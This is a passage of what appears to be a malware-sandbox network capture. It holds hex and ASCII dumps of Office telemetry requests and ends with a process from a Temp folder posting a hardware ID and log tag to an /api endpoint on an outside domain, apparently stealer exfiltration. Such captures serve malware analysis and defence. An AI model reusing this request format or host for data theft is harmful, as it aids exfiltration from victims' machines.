6f 32 74 68 Data Ascii: 446ctMYJq02CZIBQLYruoCiAo3FXZk66AQUS7N72VkUhOM/P5H+Jd7ZIoiNIqNTUWvXGXXUHKpg7Y3OArZN6Z1dV7Y6gaMc+50iiNVWo1PtTosYfdVxs32tnc4C8lz0qUVSs3KpuwyjhAOE8QO+LxUnqzRg6DiOYLSd3lvzMdAhETK75p3rAb/9I+3JI5MyaCuHGEzsAKtFpbXqIvZI8NUhep9ykbcIi6BTsNkfkjc9Joo9TMhxsgCM0Qo2th
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 37 51 62 77 4f 6b 54 6a 69 64 42 42 36 38 77 65 4e 51 6b 6d 31 32 42 6e 64 34 53 32 6d 7a 34 6a 54 6c 65 72 31 71 51 72 68 32 2f 6e 48 71 4a 71 44 38 75 4a 30 6b 33 75 31 31 45 50 52 44 4f 57 65 69 64 33 67 76 7a 4d 64 43 39 47 57 61 37 64 71 32 6a 42 4a 50 49 47 38 44 52 43 37 5a 37 45 54 2b 7a 4c 45 43 63 4f 49 74 35 67 62 6e 75 48 75 5a 4d 77 5a 77 30 61 71 73 37 6b 4d 34 6b 4f 37 51 33 75 4f 46 6a 6f 7a 4e 30 45 2b 34 45 55 4f 55 52 30 6d 47 64 6d 64 49 2b 34 6d 6a 6f 6a 54 31 79 6a 32 36 74 74 77 79 2f 6e 44 4f 6f 36 54 75 57 48 7a 55 72 6e 7a 42 63 7a 43 43 33 64 49 79 6b 77 69 61 54 55 62 47 64 74 58 61 37 45 35 6c 37 4b 49 65 34 42 39 48 4a 51 70 70 57 43 54 65 36 42 53 33 55 4b 4b 64 64 78 5a 6d 4b 4c 73 6f 59 34 49 6b 56 58 72 74 69 6b 62 73 34 Data Ascii: 7QbwOkTjidBB68weNQkm12Bnd4S2mz4jTler1qQrh2/nHqJqD8uJ0k3u11EPRDOWeid3gvzMdC9GWa7dq2jBJPIG8DRC7Z7ET+zLECcOIt5gbnuHuZMwZw0aqs7kM4kO7Q3uOFjozN0E+4EUOUR0mGdmdI+4mjojT1yj26ttwy/nDOo6TuWHzUrnzBczCC3dIykwiaTUbGdtXa7E5l7KIe4B9HJQppWCTe6BS3UKKddxZmKLsoY4IkVXrtikbs4
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 48 4a 51 70 70 57 43 54 65 36 42 53 33 55 49 4a 64 68 6f 62 58 53 4f 75 35 6b 78 4a 45 52 5a 6f 4e 47 75 5a 63 34 72 37 41 2f 76 4e 45 2f 76 69 4d 64 59 35 38 67 66 4f 55 52 69 6d 47 52 2f 4d 4e 62 38 75 7a 4d 78 51 48 57 75 78 36 30 72 31 6d 48 35 52 75 55 2b 44 37 44 4d 78 55 2f 71 79 68 55 39 42 44 37 64 62 57 78 78 68 4c 71 56 4f 53 74 46 57 71 7a 57 6f 6d 66 4a 4b 4f 63 55 38 44 64 4a 2b 6f 61 43 42 4b 4c 47 43 33 56 63 62 4f 35 7a 63 47 47 59 2f 71 45 33 4b 55 31 64 75 35 61 37 4a 64 42 76 35 77 71 69 61 67 2f 6a 6a 4d 35 4e 36 73 63 58 50 51 73 6a 30 58 46 6d 66 49 43 75 6b 7a 51 75 54 56 57 68 33 36 6c 73 78 43 54 71 43 2b 59 31 54 71 6a 43 67 6b 33 36 67 55 74 31 4d 6a 7a 56 62 30 6c 37 67 72 58 55 4b 32 6c 61 47 71 72 61 35 44 4f 4a 4b 2b 77 4f Data Ascii: HJQppWCTe6BS3UIJdhobXSOu5kxJERZoNGuZc4r7A/vNE/viMdY58gfOURimGR/MNb8uzMxQHWux60r1mH5RuU+D7DMxU/qyhU9BD7dbWxxhLqVOStFWqzWomfJKOcU8DdJ+oaCBKLGC3VcbO5zcGGY/qE3KU1du5a7JdBv5wqiag/jjM5N6scXPQsj0XFmfICukzQuTVWh36lsxCTqC+Y1TqjCgk36gUt1MjzVb0l7grXUK2laGqra5DOJK+wO
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 32 4a 78 6b 33 6d 78 78 78 31 53 6d 7a 66 65 79 63 6f 7a 70 4f 7a 41 57 56 69 59 4f 33 4a 36 6e 4b 4a 4b 4f 78 47 75 6e 4a 44 36 34 44 4b 52 65 54 49 48 7a 38 4e 4a 39 52 6f 59 33 79 48 75 5a 49 31 49 6b 5a 62 71 64 71 75 62 63 6f 73 37 77 6e 74 4f 67 2b 6d 7a 4d 56 53 6f 70 6c 54 45 42 4d 6e 31 6d 55 6e 62 38 43 6c 31 44 4d 72 41 77 4c 74 32 71 31 74 7a 79 72 73 42 2b 51 36 53 75 43 49 77 30 7a 6b 77 68 77 78 41 53 33 58 5a 32 74 2b 68 4c 32 56 4f 43 78 4d 55 61 69 57 36 69 76 4f 4e 36 42 65 6f 67 4e 4d 2f 70 76 53 52 71 4c 65 58 53 78 45 4b 39 51 6a 50 7a 43 50 72 70 34 2b 4b 55 5a 56 71 4e 57 72 62 4d 51 70 37 41 7a 72 4f 6b 6e 6e 68 64 42 4a 37 73 38 55 4f 77 67 69 31 57 6c 6b 66 63 37 79 31 44 4d 2f 41 77 4c 74 2b 71 4e 6d 35 79 54 73 41 61 49 74 41 Data Ascii: 2Jxk3mxxx1SmzfeycozpOzAWViYO3J6nKJKOxGunJD64DKReTIHz8NJ9RoY3yHuZI1IkZbqdqubcos7wntOg+mzMVSoplTEBMn1mUnb8Cl1DMrAwLt2q1tzyrsB+Q6SuCIw0zkwhwxAS3XZ2t+hL2VOCxMUaiW6ivON6BeogNM/pvSRqLeXSxEK9QjPzCPrp4+KUZVqNWrbMQp7AzrOknnhdBJ7s8UOwgi1Wlkfc7y1DM/AwLt+qNm5yTsAaItA
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 4b 35 64 6c 54 62 55 51 61 33 33 4e 33 63 38 79 4e 67 6a 63 78 53 46 65 68 6c 72 73 6c 30 47 2f 6e 43 71 4a 71 44 2b 36 44 79 30 6e 74 77 42 6f 35 43 53 6e 52 5a 6d 5a 32 69 72 61 65 4e 43 46 46 57 36 6a 63 70 32 72 44 4a 75 63 4f 35 54 46 64 71 4d 4b 43 54 66 71 42 53 33 55 74 4b 38 70 74 64 7a 43 52 38 6f 31 30 49 45 38 61 39 5a 61 67 59 63 59 72 35 77 72 6b 4e 30 6e 6c 6a 63 31 4c 34 73 34 58 50 67 30 71 32 57 35 69 66 59 71 75 6e 6a 38 6f 54 31 4f 68 32 2b 51 6c 69 53 6a 34 52 72 70 79 66 75 57 43 7a 45 33 30 67 51 78 37 48 57 7a 66 62 79 63 6f 7a 72 32 59 4f 79 52 4d 57 61 37 58 72 6e 6e 62 49 2b 6b 4f 35 7a 35 45 35 6f 72 51 54 4f 33 49 45 44 59 4e 4b 39 42 76 62 58 4f 4a 2f 4e 70 30 49 46 73 61 39 5a 61 48 66 4e 6b 69 6f 42 6d 73 4b 77 2f 76 67 49 Data Ascii: K5dlTbUQa33N3c8yNgjcxSFehlrsl0G/nCqJqD+6Dy0ntwBo5CSnRZmZ2iraeNCFFW6jcp2rDJucO5TFdqMKCTfqBS3UtK8ptdzCR8o10IE8a9ZagYcYr5wrkN0nljc1L4s4XPg0q2W5ifYqunj8oT1Oh2+QliSj4RrpyfuWCzE30gQx7HWzfbycozr2YOyRMWa7XrnnbI+kO5z5E5orQTO3IEDYNK9BvbXOJ/Np0IFsa9ZaHfNkioBmsKw/vgI
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 41 54 41 43 49 39 64 71 62 6e 53 47 76 35 51 77 49 30 52 66 72 74 71 76 62 4d 6f 67 35 41 2f 73 4f 30 43 6f 77 6f 4a 4e 2b 6f 46 4c 64 53 55 33 32 32 39 71 4d 4a 48 79 6a 58 51 67 54 78 72 31 6c 71 68 6c 7a 43 2f 71 41 4f 59 33 53 65 4b 4a 77 6b 48 68 7a 68 63 7a 41 43 50 59 61 47 35 78 69 4c 6d 65 50 79 46 4f 57 61 76 51 35 43 57 4a 4b 50 68 47 75 6e 4a 76 38 34 48 4f 54 61 4c 65 58 53 78 45 4b 39 51 6a 50 7a 43 46 73 4a 41 7a 4a 30 35 5a 70 64 4f 67 59 63 77 76 36 42 54 71 4d 6b 6a 36 6e 73 4a 44 35 38 30 51 4e 51 41 71 30 57 56 6b 64 4d 37 79 31 44 4d 2f 41 77 4c 74 2b 36 68 73 34 43 6a 37 52 76 31 38 56 71 69 4c 7a 67 71 36 67 52 49 2b 44 69 50 56 59 47 46 7a 68 62 6d 65 4e 53 42 4c 56 37 2f 56 71 32 54 4e 4c 2b 38 41 35 44 4e 41 37 6f 76 4c 53 2b 72 Data Ascii: ATACI9dqbnSGv5QwI0RfrtqvbMog5A/sO0CowoJN+oFLdSU3229qMJHyjXQgTxr1lqhlzC/qAOY3SeKJwkHhzhczACPYaG5xiLmePyFOWavQ5CWJKPhGunJv84HOTaLeXSxEK9QjPzCFsJAzJ05ZpdOgYcwv6BTqMkj6nsJD580QNQAq0WVkdM7y1DM/AwLt+6hs4Cj7Rv18VqiLzgq6gRI+DiPVYGFzhbmeNSBLV7/Vq2TNL+8A5DNA7ovLS+r
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 68 4c 2f 64 57 31 33 6e 72 75 44 4f 32 63 4e 47 71 4b 57 2f 46 4b 4a 4a 75 63 64 38 79 52 43 2b 49 75 43 64 61 79 42 43 33 56 63 62 4f 31 67 61 58 36 4a 71 6f 56 35 41 46 56 51 71 73 61 6a 66 4d 5a 76 72 6b 62 6b 63 68 65 37 77 6f 4a 4f 38 34 46 4c 5a 56 5a 33 6a 54 41 77 49 4e 79 6a 32 69 31 6e 56 52 72 31 68 4f 6f 72 32 32 2b 34 52 71 55 78 58 66 71 4b 77 56 7a 68 68 69 30 4c 49 7a 62 56 5a 58 42 68 73 49 4b 54 4c 69 70 46 54 62 79 61 73 57 6a 48 49 65 63 51 6f 6e 77 50 35 38 79 61 63 36 4b 4a 55 77 70 4b 62 4d 41 6a 50 7a 43 37 76 35 6f 36 49 46 56 4c 34 50 47 2b 5a 73 38 34 38 55 61 73 63 6b 6d 6f 31 4a 49 45 6f 73 55 43 64 56 78 38 69 6a 67 79 49 39 6e 73 78 69 74 70 57 68 71 37 6c 76 77 35 68 32 2f 79 52 72 70 79 43 4f 75 65 30 45 7a 68 31 78 42 79 Data Ascii: hL/dW13nruDO2cNGqKW/FKJJucd8yRC+IuCdayBC3VcbO1gaX6JqoV5AFVQqsajfMZvrkbkche7woJO84FLZVZ3jTAwINyj2i1nVRr1hOor22+4RqUxXfqKwVzhhi0LIzbVZXBhsIKTLipFTbyasWjHIecQonwP58yac6KJUwpKbMAjPzC7v5o6IFVL4PG+Zs848Uasckmo1JIEosUCdVx8ijgyI9nsxitpWhq7lvw5h2/yRrpyCOue0Ezh1xBy
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 73 6e 52 59 32 79 6d 6a 4d 78 55 68 65 4b 32 4b 4e 71 33 7a 2f 33 43 61 4a 38 44 2b 37 4d 6d 68 69 73 67 52 63 6b 52 48 53 49 4d 54 77 6c 33 65 76 45 5a 6a 67 4e 51 2b 33 41 35 44 4f 62 59 61 41 55 6f 6d 6f 50 72 34 2f 51 57 4f 54 43 42 54 5a 44 45 75 5a 45 61 58 65 50 71 6f 51 6a 4b 41 78 30 6d 2f 65 61 56 64 77 73 37 67 6a 6c 4a 46 36 6f 77 6f 4a 46 6f 70 6b 71 64 55 78 73 35 79 30 6e 61 4d 37 6b 31 41 45 6b 54 56 53 71 77 4c 55 6d 37 69 48 6e 42 2f 51 69 57 4f 66 44 37 48 7a 44 67 56 31 31 41 6d 79 41 4d 53 6b 77 69 71 33 55 62 48 63 52 41 66 69 46 38 7a 75 62 4d 4b 34 66 6f 69 51 50 73 4e 36 4d 43 76 43 42 53 33 56 44 4c 38 70 78 59 58 4f 59 76 39 4d 4b 47 57 52 55 71 74 65 79 65 38 51 6a 77 51 58 7a 4f 48 48 57 6d 63 46 45 37 4d 59 46 4a 45 52 69 6d Data Ascii: snRY2ymjMxUheK2KNq3z/3CaJ8D+7MmhisgRckRHSIMTwl3evEZjgNQ+3A5DObYaAUomoPr4/QWOTCBTZDEuZEaXePqoQjKAx0m/eaVdws7gjlJF6owoJFopkqdUxs5y0naM7k1AEkTVSqwLUm7iHnB/QiWOfD7HzDgV11AmyAMSkwiq3UbHcRAfiF8zubMK4foiQPsN6MCvCBS3VDL8pxYXOYv9MKGWRUqteye8QjwQXzOHHWmcFE7MYFJERim
2024-11-22 19:36:35 UTC	1369	IN	Data Raw: 4b 71 6f 45 33 4e 30 52 6b 6b 2f 75 32 62 4e 6b 73 6f 69 72 6c 50 30 50 57 73 76 56 62 35 64 46 52 45 77 63 36 32 79 4d 70 4d 4a 62 38 7a 48 51 4b 55 56 32 39 31 65 5a 48 7a 69 4c 73 52 76 31 38 56 71 69 61 67 68 4b 78 6a 31 4d 6e 52 48 53 59 4a 47 52 69 6e 4c 71 58 49 69 51 45 5a 4a 50 37 74 6d 7a 5a 4c 4b 49 33 37 7a 5a 5a 2f 59 2f 53 54 64 7a 2f 50 69 63 44 50 4e 73 68 51 6b 72 4d 6a 59 49 33 4a 30 31 64 37 5a 6a 6b 63 34 6c 33 6f 43 76 77 4e 56 2f 72 7a 75 64 77 6f 50 41 46 4e 67 51 69 33 79 4e 34 50 70 66 38 67 6e 52 2f 45 42 54 74 78 4f 51 7a 69 57 6a 75 43 2b 4d 78 51 65 75 65 30 45 7a 68 31 78 42 79 4f 68 4c 33 61 47 5a 67 67 36 32 5a 4d 44 46 39 5a 49 72 51 6f 57 7a 33 45 64 63 58 35 53 49 4e 7a 6f 2f 55 53 61 4b 50 55 79 31 45 64 4a 68 45 59 58 Data Ascii: KqoE3N0Rkk/u2bNksoirlP0PWsvVb5dFREwc62yMpMJb8zHQKUV291eZHziLsRv18VqiaghKxj1MnRHSYJGRinLqXIiQEZJP7tmzZLKI37zZZ/Y/STdz/PicDPNshQkrMjYI3J01d7Zjkc4l3oCvwNV/rzudwoPAFNgQi3yN4Ppf8gnR/EBTtxOQziWjuC+MxQeue0Ezh1xByOhL3aGZgg62ZMDF9ZIrQoWz3EdcX5SINzo/USaKPUy1EdJhEYX

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:35 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:36 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:36 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ce6cb833-501e-007b-514e-3c5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193636Z-15b8b599d882hxlwhC1TEBfa5w00000001s000000000d5cc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:36 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:35 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:36 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:36 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193636Z-174c587ffdfn4nhwhC1TEB2nbc0000000200000000007tms x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:36 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:36 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:36 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:36 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193636Z-174c587ffdf8fcgwhC1TEBnn7000000001yg00000000r7ek x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:36 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:36 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:36 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:36 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: c6f64b36-301e-0000-4706-3deecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193636Z-178bfbc474bwlrhlhC1NYCy3kg00000003d000000000e3s2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-22 19:36:36 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:36 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:37 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:36 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193636Z-178bfbc474bgvl54hC1NYCsfuw00000003bg00000000h602 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:37 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49858	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:37 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IUYO6GXLJEKLOGZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18151 Host: property-imper.sbs
2024-11-22 19:36:37 UTC	15331	OUT	Data Raw: 2d 2d 49 55 59 4f 36 47 58 4c 4a 45 4b 4c 4f 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 49 55 59 4f 36 47 58 4c 4a 45 4b 4c 4f 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 55 59 4f 36 47 58 4c 4a 45 4b 4c 4f 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --IUYO6GXLJEKLOGZContent-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--IUYO6GXLJEKLOGZContent-Disposition: form-data; name="pid"2--IUYO6GXLJEKLOGZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
